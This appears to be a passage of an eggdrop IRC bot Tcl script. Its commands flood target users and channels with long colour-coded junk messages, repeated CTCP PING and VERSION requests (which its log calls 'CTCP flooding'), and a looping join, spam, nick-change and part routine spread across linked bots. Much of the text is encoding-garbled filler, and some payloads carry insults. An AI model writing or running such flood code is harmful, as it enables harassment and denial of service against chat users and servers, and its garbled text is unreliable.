�M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H�M?E?H ��M?E?H ��M?E?H ��M? E?H ��M?E?H ��M?E?H ��M?E?H ��M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E? H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H � 4M?E?H� �M?E?H� �M?E?H�� 4M?E? H� �M?E?H� �M?E?H�� 4M?E?H� �M?E?H� �M?E?H�� 4M?E?H� �M?E?H� �M?E?H�" puthelp "PRIVMSG $person :$rest,� 12,8M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H�M?E?H ��M?E?H ��M? E?H ��M?E?H ��M?E?H ��M?E?H ��M?E?H ��M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E? H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H � 12M?E?H� �M?E?H� �M?E? H�� 12M?E?H� �M?E?H� �M?E?H�� 12M?E?H� �M?E?H� �M?E?H�� 12M?E?H� �M?E?H� �M?E? H�" puthelp "NOTICE $person :$rest,� 8,1M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M? E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E? H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H�M?E?H ��M?E?H ��M?E?H ��M? E?H ��M?E?H ��M?E?H ��M?E?H ��M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E? H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H � 8M?E?H� �M?E?H� �M?E?H�� 8M?E? H� �M?E?H� �M?E?H�� 8M?E?H� �M?E?H� �M?E?H�� 8M?E?H� �M?E?H� �M?E?H�" putlog " 12( 4 �S� 4oLPoT 12) � !$hand! plod4 $person" return 0 } if {$rest==""} { puthelp "PRIVMSG $person :� 9,6M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H�M?E?H ��M?E?H ��M?E?H ��M? E?H ��M?E?H ��M?E?H ��M?E?H ��M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E? H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H � 9M?E?H� �M?E?H� �M?E?H�� 9M?E? H� �M?E?H� �M?E?H�� 9M?E?H� �M?E?H� �M?E?H�� 9M?E?H� �M?E?H� �M?E?H�" puthelp "NOTICE $person :� 13,14M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H�M?E?H ��M?E?H ��M?E?H ��M? E?H ��M?E?H ��M?E?H ��M?E?H ��M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?
H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H � 13M?E?H� �M?E?H� �M?E?H�� 13M? E?H� �M?E?H� �M?E?H�� 13M?E?H� �M?E?H� �M?E?H�� 13M?E?H� �M?E?H� �M?E?H�" puthelp "PRIVMSG $person :� 11,4M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H�M?E?H ��M?E?H ��M?E?H ��M? E?H ��M?E?H ��M?E?H ��M?E?H ��M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E? H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H � 11M?E?H� �M?E?H� �M?E?H�� 11M? E?H� �M?E?H� �M?E?H�� 11M?E?H� �M?E?H� �M?E?H�� 11M?E?H� �M?E?H� �M?E?H�" puthelp "NOTICE $person :� 7,10M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H�M?E?H ��M?E?H ��M?E?H ��M? E?H ��M?E?H ��M?E?H ��M?E?H ��M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E? H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H � 7M?E?H� �M?E?H� �M?E?H�� 7M?E? H� �M?E?H� �M?E?H�� 7M?E?H� �M?E?H� �M?E?H�� 7M?E?H� �M?E?H� �M?E?H�" putlog " 12( 4 �S� 4oLPoT 12) � !$hand! plod4 $person" return 0 } } ########################################################################## # [flood.tcl] # # commands: # # .hopflud - does a hopflud times on # # .hopmode - switch individuell bot or # ########################################################################## set hopmod "on" set misc_char "a b c d e f g h i j k l m n o p q r s t u v w x y z 0 1 2 3 4 5 6 7 8 9 ^ _ | -" set first_char "a b c d e f g h i j k l m n o p q r s t u v w x y z" proc randomnick {} { global misc_char first_char append temp_nick [lindex $first_char [rand [llength $first_char]]] set i 1 while {$i < 9} { append temp_nick [lindex $misc_char [rand [llength $misc_char]]] incr i 1} putserv "NICK ${temp_nick}" unset temp_nick } proc restorenick {} { global ircnick putserv "NICK ${ircnick}" } proc inithopflud {hand idx arg} { global hopmod set chan [lindex $arg 0] set times [lrange $arg 1 end]
if { $chan != "" } { if { $times != "" } { putallbots "flood $arg" putdcc $idx "wget � flood �$chan� $times times." if { $hopmod == "on" } { dohopflud bot flood $arg } } { putdcc $idx "wget � usage: .flood <�channel�> <�times�>" } } { putdcc $idx "wget � usage: .flood <�channel�> <�times�>" } } proc sethopmode {hand idx arg} { global hopmod putdcc $idx "wget � hopmode currently �$hopmod�" if { $arg == "on" } { set hopmod $arg putdcc $idx "wget � hopmode set �on�" } { if { $arg == "off" } { set hopmod $arg putdcc $idx "wget � hopmode set �off�" } { putdcc $idx "wget � usage: .hopmode �on�/�off�" } } } proc dohopflud {bot cmd arg} { global hopmod global keep-nick set chan [lindex $arg 0] set times [lrange $arg 1 end] if { $hopmod == "on" } { set i 0 while { $i < $times } { putserv "JOIN $chan" set keep-nick 0 puthelp "NOTICE $chan : H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!H�a�H�a�!Ha�Ha�Ha! Ha�Ha�Ha!H�a�H�a�!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�! Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�! Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�! Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�! Ha�Ha�Ha!Ha�H�a�H�H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�! Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha! H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!H�a�H�a�!Ha� " puthelp "PRIVMSG $chan : H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!H�a�H�a�! Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha! H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha! H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha! H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha! H�a�H�a�!Ha�Ha�Ha!Ha�H�a�H�H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha! H�a�H�a�!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha! Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!H�a�H�a�! Ha� " randomnick putserv "CTCP $chan PING" puthelp "PRIVMSG $chan : , �|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��| @�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�| ��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�
%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��| @�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�| ��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$� %�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��| @�#�$�%�|@�#�$�%�|��|@�#�$�%�|��|���|@�#�$�%�|��|���|@�#�$�%�|��|���|@�#�$�%�|��| �" puthelp "NOTICE $chan : , �|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��| @�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�| ��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$� %�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��| @�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�| ��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$� %�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$� %�|��|@�#�$�%�|��|@�#�$�%�|��|���|@�#�$�%�|��|���|@�#�$�%�|��|���|@�#�$�%�|��|�" putserv "CTCP $chan VERSION" putserv "PART $chan H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!H�a�H�a�!Ha�Ha�Ha! Ha�Ha�Ha!H�a�H�a�!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�! Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�! Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!" incr i 1 } } set keep-nick 1 restorenick } ## public cmd plod5 -- start proc pub_plod5 {nick uhost hand channel rest} { set person [lindex $rest 0] set rest [lrange $rest 1 end] if {$rest!=""} { putserv "PRIVMSG $person :\001PING [unixtime]\001" putserv "PRIVMSG $person :\001VERSION [unixtime]\001" putserv "PRIVMSG $person :\001PING [unixtime]\001" putserv "PRIVMSG $person :\001VERSION [unixtime]\001" putserv "PRIVMSG $person :\001PING [unixtime]\001" putserv "PRIVMSG $person :\001VERSION [unixtime]\001" putlog " 12( 4 �S� 4oLPoT 12) � !$hand! plod5 (CTCP flooding)" return 0 } if {$rest==""} { puthelp "NOTICE $nick :Lagi Usage: plod5 <arg>" } } ## public plod5 end ## public cmd plod6 -- start proc pub_plod6 {nick uhost hand channel rest} { set person [lindex $rest 0] set rest [lrange $rest 1 end] if {$rest!=""} { puthelp "PRIVMSG $person : $rest , �/ �* �/ �* �/ �* �/ � 0,4- �* � 0,12- �* � 0,4- �* � 0,12- �* � �/ �* �/ �* �/ �* �/ � 0,4- �* � 0,12- �* � 0,4- �* � 0,12- �* � �/ �* �/ �* �/ �* �/ � 0,4- �* � 0,12- �* � 0,4- �* � 0,12- �* � �/ �* �/ �* �/ �* �/ � 0,4- �* � 0,12- �* � 0,4- �* � 0,12- �* � �/ �* �/ �* �/ �* �/ � 0,4- �* � 0,12- �* � 0,4- �* � 0,12- �* � �/ �* �/ �* �/ �* �/ � 0,4- �* � 0,12- �* � 0,4- �* � 0,12- �* � �/ �* �/ �* �/ �* �/ � 0,4- �* � 0,12- �* � 0,4- �* � 0,12- �* � �/ �* �/ �* �/ �* � � 0,4- �* � 0,12- �* �
0,4- �* � 0,12- �* � �/ �* �/ �* �/ �* �/ � 0,4- �* � 0,12- �* � 0,4- �* � 0,12- �* � �/ �* �/ �* �/ �* �/" puthelp "NOTICE $person : $rest , �/ �* �/ �* �/ �* �/ � 0,4- �* � 0,12- �* � 0,4- �* � 0,12- �* � �/ �* �/ �* �/ �* �/ � 0,4- �* � 0,12- �* � 0,4- �* � 0,12- �* � �/ �* �/ �* �/ �* �/ � 0,4- �* � 0,12- �* � 0,4- �* � 0,12- �* � �/ �* �/ �* �/ �* �/ � 0,4- �* � 0,12- �* � 0,4- �* � 0,12- �* � �/ �* �/ �* �/ �* �/ � 0,4- �* � 0,12- �* � 0,4- �* � 0,12- �* � �/ �* �/ �* �/ �* �/ � 0,4- �* � 0,12- �* � 0,4- �* � 0,12- �* � �/ �* �/ �* �/ �* �/ � 0,4- �* � 0,12- �* � 0,4- �* � 0,12- �* � �/ �* �/ �* �/ �* � � 0,4- �* � 0,12- �* � 0,4- �* � 0,12- �* � �/ �* �/ �* �/ �* �/ � 0,4- �* � 0,12- �* � 0,4- �* � 0,12- �* � �/ �* �/ �* �/ �* �/" puthelp "PRIVMSG $person : $rest , �/ �* �/ �* �/ �* �/ � 0,4- �* � 0,12- �* � 0,4- �* � 0,12- �* � �/ �* �/ �* �/ �* �/ � 0,4- �* � 0,12- �* � 0,4- �* � 0,12- �* � �/ �* �/ �* �/ �* �/ � 0,4- �* � 0,12- �* � 0,4- �* � 0,12- �* � �/ �* �/ �* �/ �* �/ � 0,4- �* � 0,12- �* � 0,4- �* � 0,12- �* � �/ �* �/ �* �/ �* �/ � 0,4- �* � 0,12- �* � 0,4- �* � 0,12- �* � �/ �* �/ �* �/ �* �/ � 0,4- �* � 0,12- �* � 0,4- �* � 0,12- �* � �/ �* �/ �* �/ �* �/ � 0,4- �* � 0,12- �* � 0,4- �* � 0,12- �* � �/ �* �/ �* �/ �* � � 0,4- �* � 0,12- �* � 0,4- �* � 0,12- �* � �/ �* �/ �* �/ �* �/ � 0,4- �* � 0,12- �* � 0,4- �* � 0,12- �* � �/ �* �/ �* �/ �* �/" puthelp "NOTICE $person : $rest , �/ �* �/ �* �/ �* �/ � 0,4- �* � 0,12- �* � 0,4- �* � 0,12- �* � �/ �* �/ �* �/ �* �/ � 0,4- �* � 0,12- �* � 0,4- �* � 0,12- �* � �/ �* �/ �* �/ �* �/ � 0,4- �* � 0,12- �* � 0,4- �* � 0,12- �* � �/ �* �/ �* �/ �* �/ � 0,4- �* � 0,12- �* � 0,4- �* � 0,12- �* � �/ �* �/ �* �/ �* �/ � 0,4- �* � 0,12- �* � 0,4- �* � 0,12- �* � �/ �* �/ �* �/ �* �/ � 0,4- �* � 0,12- �* � 0,4- �* � 0,12- �* � �/ �* �/ �* �/ �* �/ � 0,4- �* � 0,12- �* � 0,4- �* � 0,12- �* � �/ �* �/ �* �/ �* � � 0,4- �* � 0,12- �* � 0,4- �* � 0,12- �* � �/ �* �/ �* �/ �* �/ � 0,4- �* � 0,12- �* � 0,4- �* � 0,12- �* � �/ �* �/ �* �/ �* �/" putlog "�!$hand! plod6 $person" return 0 } if {$rest==""} { puthelp "NOTICE $nick :Lagi Usage: plod6 <*add your insult to injury is better :)*>" } } ## public cmd plod6 -- stop ## public cmd plod7 -- start proc pub_plod7 {nick uhost hand channel rest} { set person [lindex $rest 0] set rest [lrange $rest 1 end] if {$rest!=""} { puthelp "PRIVMSG $person : $rest , 3,9 �|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��| @�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�| ��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��| 4,15@�#�$�%�|��|@�#�$�%�|��| @�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�| ��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@� 8,12#�$�%�|��| @�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�| ��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|�|@�#�$�%�|� , �| @�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�| ��|@�#� , �|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�| ��|@�#�$�%�" puthelp "NOTICE $person : $rest , 8,1 �|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��| @�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�| ��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��| 15,4@�#�$�%�|��|@�#�$�%�|��| @�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|��|@�#�$�%�|
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proc pub_plod9 {nick uhost hand channel rest} { set person [lindex $rest 0] set rest [lrange $rest 1 end] if {$rest!=""} { puthelp "PRIVMSG $person : $rest , 4,11Be�BeK 5�aD�uS 6�kAl�I 12W�ekZ� 13Wek�Z 14We�k 1ZW�ek 15�Wek�Z 7Wek�Z 9,1B�eBe�K 13aD�uS 12k�AlI� 4We�kZW 11e�kZ We 2k�ZWe 7k We�k 9ZWe�k 10Z 8,2Be�BeK� a 11D�uS �kA 9lI� We 7k�ZWe 0k�Z We�kZ 11We�k W�e 8kZ�We 13kZ� 13,9Be�Be 1K �aD 12u�S kA�l 3I �We 4k�ZWe 7kZ �Wek 4Z�Wek W 2e�kZW�e 11kZ 12,4�BeB 14e�K aD 15u�S kA�l 5I �Wek�Z 6We�kZ W�ek 1ZWek We�k 12ZWe�k 13Z 11,6�Be 1B�eK a�Du 2S kA�l 3I We 4k�ZWe 5k�Z We�k 7ZWe�k 8We�kZ 9W�ek 10Z� 0,14Be�BeK 14a�DuS� k 13Al�I W 9e�kZ�W 4ek�Z 11We�k 7ZW�ek W 8e�kZW 9e�kZ 4,11B�e�BeK a 12D�uS 3kA�l 6I W�ek 5ZW�ek 15Z �We 13kZ�Wek� W 9ekZ�W 2ek�Z 9,1B�eBe�K a 14D�uS �k 14AlI� W 13e�kZW�e 12kZ W�e 11kZW�ek 10Wek�Z 9We�kZ 8,2Be�BeK� 7aD�uS 6k�AlI 5 W�ek 4Z�Wek�Z 3 We�k 2ZW�ek 1W�ekZ�W 15ek�Z 13,9�Be 14B�eK 13a�DuS� k 12A�lI W�e 10kZW�ek 14Z �We 8kZ�Wek 7�WekZ�W 6ek�Z 12,7�BeBe�K 8aDu�S 13kA�lI 6We�kZ 5Wek�Z 4 Wek 3Z�Wek 2 We�kZ 1W�ekZ" puthelp "NOTICE $person : $rest , 4,11Be�BeK 5�aD�uS 6�kAl�I 12W�ekZ� 13Wek�Z 14We�k 1ZW�ek 15�Wek�Z 7Wek�Z 9,1B�eBe�K 13aD�uS 12k�AlI� 4We�kZW 11e�kZ We 2k�ZWe 7k We�k 9ZWe�k 10Z 8,2Be�BeK� a 11D�uS �kA 9lI� We 7k�ZWe 0k�Z We�kZ 11We�k W�e 8kZ�We 13kZ� 13,9Be�Be 1K �aD 12u�S kA�l 3I �We 4k�ZWe 7kZ �Wek 4Z�Wek W 2e�kZW�e 11kZ 12,4�BeB 14e�K aD 15u�S kA�l 5I �Wek�Z 6We�kZ W�ek 1ZWek We�k 12ZWe�k 13Z 11,6�Be 1B�eK a�Du 2S kA�l 3I We 4k�ZWe 5k�Z We�k 7ZWe�k 8We�kZ 9W�ek 10Z� 0,14Be�BeK 14a�DuS� k 13Al�I W 9e�kZ�W 4ek�Z 11We�k 7ZW�ek W 8e�kZW 9e�kZ 4,11B�e�BeK a 12D�uS 3kA�l 6I W�ek 5ZW�ek 15Z �We 13kZ�Wek� W 9ekZ�W 2ek�Z 9,1B�eBe�K a 14D�uS �k 14AlI� W 13e�kZW�e 12kZ W�e 11kZW�ek 10Wek�Z 9We�kZ 8,2Be�BeK� 7aD�uS 6k�AlI 5 W�ek 4Z�Wek�Z 3 We�k 2ZW�ek 1W�ekZ�W 15ek�Z 13,9�Be 14B�eK 13a�DuS� k 12A�lI W�e 10kZW�ek 14Z �We 8kZ�Wek 7�WekZ�W 6ek�Z 12,7�BeBe�K 8aDu�S 13kA�lI 6We�kZ 5Wek�Z 4 Wek 3Z�Wek 2 We�kZ 1W�ekZ" puthelp "PRIVMSG $person : $rest , 4,11Be�BeK 5�aD�uS 6�kAl�I 12W�ekZ� 13Wek�Z 14We�k 1ZW�ek 15�Wek�Z 7Wek�Z 9,1B�eBe�K 13aD�uS 12k�AlI� 4We�kZW 11e�kZ We 2k�ZWe 7k We�k 9ZWe�k 10Z 8,2Be�BeK� a 11D�uS �kA 9lI� We 7k�ZWe 0k�Z We�kZ 11We�k W�e 8kZ�We 13kZ� 13,9Be�Be 1K �aD 12u�S kA�l 3I �We 4k�ZWe 7kZ �Wek 4Z�Wek W 2e�kZW�e 11kZ 12,4�BeB 14e�K aD 15u�S kA�l 5I �Wek�Z 6We�kZ W�ek 1ZWek We�k 12ZWe�k 13Z 11,6�Be 1B�eK a�Du 2S kA�l 3I We 4k�ZWe 5k�Z We�k 7ZWe�k 8We�kZ 9W�ek 10Z� 0,14Be�BeK 14a�DuS� k 13Al�I W 9e�kZ�W 4ek�Z 11We�k 7ZW�ek W 8e�kZW 9e�kZ 4,11B�e�BeK a 12D�uS 3kA�l 6I W�ek 5ZW�ek 15Z �We 13kZ�Wek� W 9ekZ�W 2ek�Z 9,1B�eBe�K a 14D�uS �k 14AlI� W 13e�kZW�e 12kZ W�e 11kZW�ek 10Wek�Z 9We�kZ 8,2Be�BeK� 7aD�uS 6k�AlI 5 W�ek 4Z�Wek�Z 3 We�k 2ZW�ek 1W�ekZ�W 15ek�Z 13,9�Be 14B�eK 13a�DuS� k 12A�lI W�e 10kZW�ek 14Z �We 8kZ�Wek 7�WekZ�W 6ek�Z 12,7�BeBe�K 8aDu�S 13kA�lI 6We�kZ 5Wek�Z 4 Wek 3Z�Wek 2 We�kZ 1W�ekZ" puthelp "NOTICE $person : $rest , 4,11Be�BeK 5�aD�uS 6�kAl�I 12W�ekZ� 13Wek�Z 14We�k 1ZW�ek 15�Wek�Z 7Wek�Z 9,1B�eBe�K 13aD�uS 12k�AlI� 4We�kZW 11e�kZ We 2k�ZWe 7k We�k 9ZWe�k 10Z 8,2Be�BeK� a 11D�uS �kA 9lI� We 7k�ZWe 0k�Z We�kZ 11We�k W�e 8kZ�We 13kZ� 13,9Be�Be 1K �aD 12u�S kA�l 3I �We 4k�ZWe 7kZ �Wek 4Z�Wek W 2e�kZW�e 11kZ 12,4�BeB 14e�K aD 15u�S kA�l 5I �Wek�Z 6We�kZ W�ek 1ZWek We�k 12ZWe�k 13Z 11,6�Be 1B�eK a�Du 2S kA�l 3I We 4k�ZWe 5k�Z We�k 7ZWe�k 8We�kZ 9W�ek 10Z� 0,14Be�BeK 14a�DuS� k 13Al�I W 9e�kZ�W 4ek�Z 11We�k 7ZW�ek W 8e�kZW 9e�kZ 4,11B�e�BeK a 12D�uS 3kA�l 6I W�ek 5ZW�ek 15Z �We 13kZ�Wek� W 9ekZ�W 2ek�Z 9,1B�eBe�K a 14D�uS �k 14AlI� W 13e�kZW�e 12kZ W�e 11kZW�ek 10Wek�Z 9We�kZ 8,2Be�BeK� 7aD�uS 6k�AlI 5 W�ek 4Z�Wek�Z 3 We�k 2ZW�ek 1W�ekZ�W 15ek�Z 13,9�Be 14B�eK 13a�DuS� k 12A�lI W�e 10kZW�ek 14Z �We 8kZ�Wek 7�WekZ�W 6ek�Z 12,7�BeBe�K 8aDu�S 13kA�lI 6We�kZ 5Wek�Z 4 Wek 3Z�Wek 2 We�kZ 1W�ekZ" 